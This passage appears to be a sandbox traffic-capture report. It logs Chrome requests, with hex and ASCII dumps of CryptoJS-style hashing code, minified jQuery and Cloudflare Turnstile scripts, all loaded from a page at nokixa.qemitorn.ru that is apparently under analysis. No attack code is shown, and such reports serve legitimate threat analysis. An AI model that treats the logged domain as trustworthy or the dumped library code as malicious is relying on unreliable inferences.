                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36
                                                                                                        Data Ascii: 1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69
                                                                                                        Data Ascii: uffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringi
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c
                                                                                                        Data Ascii: =r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKL
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f
                                                                                                        Data Ascii: abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o
                                                                                                        2025-01-09 16:18:32 UTC1369INData Raw: 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c
                                                                                                        Data Ascii: [39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.2.1749745104.18.95.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:32 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://nokixa.qemitorn.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:32 UTC386INHTTP/1.1 302 Found
                                                                                                        Date: Thu, 09 Jan 2025 16:18:32 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        access-control-allow-origin: *
                                                                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        location: /turnstile/v0/g/849bfe45bf45/api.js
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be6b3b344363-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.1749744151.101.130.1374431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:32 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                        Host: code.jquery.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://nokixa.qemitorn.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:32 UTC613INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 89501
                                                                                                        Server: nginx
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                        ETag: "28feccc0-15d9d"
                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 09 Jan 2025 16:18:32 GMT
                                                                                                        Age: 1924039
                                                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740054-EWR
                                                                                                        X-Cache: HIT, HIT
                                                                                                        X-Cache-Hits: 2774, 2
                                                                                                        X-Timer: S1736439513.821892,VS0,VE0
                                                                                                        Vary: Accept-Encoding
                                                                                                        2025-01-09 16:18:32 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                        2025-01-09 16:18:32 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                        Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                        2025-01-09 16:18:32 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                        Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                        2025-01-09 16:18:33 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                        Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                        2025-01-09 16:18:33 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                        Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                        2025-01-09 16:18:33 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                        Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.1749747104.18.95.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:33 UTC649OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://nokixa.qemitorn.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:33 UTC471INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:33 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 47521
                                                                                                        Connection: close
                                                                                                        accept-ranges: bytes
                                                                                                        last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                        access-control-allow-origin: *
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be6f0b304262-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:33 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                        Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                        Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
